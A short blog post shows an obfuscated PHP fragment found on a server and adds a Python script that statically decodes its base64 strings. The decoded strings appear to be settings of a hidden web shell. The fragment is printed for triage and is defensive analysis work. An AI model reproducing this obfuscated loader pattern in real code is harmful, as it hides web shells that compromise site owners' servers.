URL and Link repository

Thursday, February 20, 2020

Decoding PHP Scripts that Appear Malicious

Found a file on my server with code that starts like this:

$lFyE="";
$UW='ejup'.'fa6w'.'vgnoq'.'dyhstx'.'birkz'.'c%4_l'.'m';
$KQiR=fL1zG();

// vC5WdW
/* amiddhRNJ */
Kxyg8();
$Ub=70;
$lb8GNaXS=array('3NjEwZDk2YTA5MDc5MDk0ZWVkIjsKJEdMT0JBTFNbJ2RlZmF1bHRfYWN0aW9u','J10gICAgICA9ICdTcWwnOwokR0xPQkFMU1snZGVmYXVsdF91c2VfYWpheCddICA');
$lFyE=YyG($lFyE, join('', $lb8GNaXS) );
$lFyE=YyG($lFyE,"gID0gdHJ1ZTsKJEdMT0JBTFNbJ2RlZmF1bHRfY2hhcnNldCddICAgID0gJ1dpbm");
do{
DunS();
} while (3>11);
$lFyE=YyG($lFyE,jWiEh());

Look familiar? What does it do?
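One way to answer that without running the file is to pull the long string literals out of the source and decode them statically. The Python below is an added example, not part of the original post: the function names are hypothetical, it assumes `YyG()` simply appends its second argument to the first (its body is not shown), and it assumes the literals are consecutive pieces of one base64 stream whose start is not visible, so it tries all four alignments.

```python
import base64
import re
import string

# Lines copied from the snippet above (only the ones carrying string literals).
SAMPLE = r"""
$UW='ejup'.'fa6w'.'vgnoq'.'dyhstx'.'birkz'.'c%4_l'.'m';
$lb8GNaXS=array('3NjEwZDk2YTA5MDc5MDk0ZWVkIjsKJEdMT0JBTFNbJ2RlZmF1bHRfYWN0aW9u','J10gICAgICA9ICdTcWwnOwokR0xPQkFMU1snZGVmYXVsdF91c2VfYWpheCddICA');
$lFyE=YyG($lFyE, join('', $lb8GNaXS) );
$lFyE=YyG($lFyE,"gID0gdHJ1ZTsKJEdMT0JBTFNbJ2RlZmF1bHRfY2hhcnNldCddICAgID0gJ1dpbm");
"""

# Quoted literals of 20+ base64-alphabet characters; short ones like 'ejup' are skipped.
B64_LITERAL = re.compile(r"""(['"])([A-Za-z0-9+/=]{20,})\1""")
PRINTABLE = set(string.printable.encode())


def extract_fragments(php_source):
    """Return long base64-looking string literals in source order (never executes PHP)."""
    return [m.group(2) for m in B64_LITERAL.finditer(php_source)]


def decode_partial(stream):
    """Try the four base64 alignments; return (offset, bytes) of the most printable decode."""
    best = (-1.0, 0, b"")
    for offset in range(4):
        chunk = stream[offset:]
        chunk = chunk[: len(chunk) - len(chunk) % 4]  # drop incomplete tail
        try:
            raw = base64.b64decode(chunk, validate=True)
        except ValueError:
            continue
        score = sum(b in PRINTABLE for b in raw) / max(len(raw), 1)
        if score > best[0]:
            best = (score, offset, raw)
    return best[1], best[2]


def triage(php_source):
    # Assumption: YyG() appends its second argument to the first (its body is not shown).
    offset, raw = decode_partial("".join(extract_fragments(php_source)))
    return offset, raw.decode("ascii", errors="replace")


if __name__ == "__main__":
    off, text = triage(SAMPLE)
    print(f"alignment offset {off}:\n{text}")
```

Run on the lines quoted above, it prints the recovered text, which is a run of PHP `$GLOBALS[...]` configuration assignments. The undefined helpers (`fL1zG`, `jWiEh` and the rest) are never called.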